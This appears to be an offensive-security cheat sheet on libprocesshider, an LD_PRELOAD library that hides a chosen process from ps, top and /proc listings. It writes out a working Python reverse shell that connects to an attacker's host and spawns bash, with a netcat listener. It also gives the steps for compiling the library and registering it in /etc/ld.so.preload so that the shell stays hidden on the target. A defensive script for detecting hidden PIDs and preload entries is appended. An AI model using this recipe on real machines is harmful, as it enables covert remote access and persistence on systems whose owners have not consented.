General
GOAL ---> Hide process from ps aux
Libprocesshider is a shared library that hides a process from tools such as ps, top and ls /proc. Loaded into every program through the dynamic linker (LD_PRELOAD or /etc/ld.so.preload), it hooks readdir() and filters the entry for a chosen process name out of /proc listings, so process management utilities no longer show the process name, its arguments or its presence. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.
Important
- Can only hide one process at a time
Commands
The repository needs to be cloned on the target (Linux machine)
Download the repository (Target)
git clone https://github.com/gianlucaborello/libprocesshider.git
Create reverse shell and compile the code (Target)
# Create a reverse shell (reverse_shell.py)
nano reverse_shell.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
# Connect back to the listener; replace IP and PORT with the attacking host
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP", PORT))
# Redirect stdin, stdout and stderr to the socket
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
run(["/bin/bash", "-i"])
# Make the script executable
chmod +x reverse_shell.py
# Edit processhider.c
nano processhider.c
- Change the process name to filter (the process_to_filter string) from the default python script name to the name of your evil script, here reverse_shell.py
- Save
# Compile the code in the repository directory
USER@sid:~/libprocesshider$ make
---> This will create libprocesshider.so
# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/
# Load it with the global dynamic linker (every dynamically linked program on the system will now load it at startup)
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
Launch the reverse_shell
./reverse_shell.py
Netcat Listener (Attacking)
nc -lvnp PORT
The process should now be hidden from ps aux
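Because the hook only filters what readdir() returns, the hidden process is still reachable by opening /proc/<pid> directly, and the loader entry in /etc/ld.so.preload is itself visible. The following detection script is an added example written for this page, not code from the libprocesshider project; it assumes a Linux /proc and reports both the preload entries and any process that exists but is missing from the directory listing.

```python
#!/usr/bin/env python3
"""Added example (not from the libprocesshider project): find processes that a
readdir(3) hook hides from ps/ls by cross-checking the /proc listing against
direct path access, and report whatever /etc/ld.so.preload loads."""
import os

PRELOAD_FILE = "/etc/ld.so.preload"

def preload_entries(text):
    """Parse ld.so.preload content: a whitespace-separated list of object paths."""
    return text.split()

def readdir_pids(proc="/proc"):
    """PIDs as returned by readdir(3): the call a preloaded hook can filter."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}

def is_process(pid, proc="/proc"):
    """True if /proc/<pid>/status exists and describes a thread-group leader.
    Opening the path directly never goes through readdir, so a hidden entry
    is still reachable. Thread IDs (Tgid != Pid) are excluded."""
    try:
        with open(f"{proc}/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return False
    return False

def probed_pids(max_pid, proc="/proc"):
    """Every real process in 1..max_pid found by direct path access."""
    return {pid for pid in range(1, max_pid + 1) if is_process(pid, proc)}

def hidden_pids(visible, alive):
    """Processes that exist but are missing from the directory listing."""
    return sorted(alive - visible)

def scan(proc="/proc"):
    """Full check; re-reads the listing afterwards and re-probes candidates to
    discard processes that merely started or exited during the sweep."""
    with open(f"{proc}/sys/kernel/pid_max") as fh:
        max_pid = int(fh.read())
    visible = readdir_pids(proc)
    alive = probed_pids(max_pid, proc)
    visible |= readdir_pids(proc)
    return [p for p in hidden_pids(visible, alive) if is_process(p, proc)]

if __name__ == "__main__":
    if os.path.exists(PRELOAD_FILE):
        with open(PRELOAD_FILE) as fh:
            for entry in preload_entries(fh.read()):
                print(f"[preload] {entry} is injected into every dynamically linked program")
    for pid in scan():
        with open(f"/proc/{pid}/comm") as fh:
            print(f"[hidden] pid {pid} ({fh.read().strip()}) exists but is not listed")
```

Run it as root so that every /proc/<pid>/status is readable; the full sweep walks the whole PID range, so it takes a few seconds on hosts where pid_max is large.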
More Information
More information ---> https://github.com/gianlucaborello/libprocesshider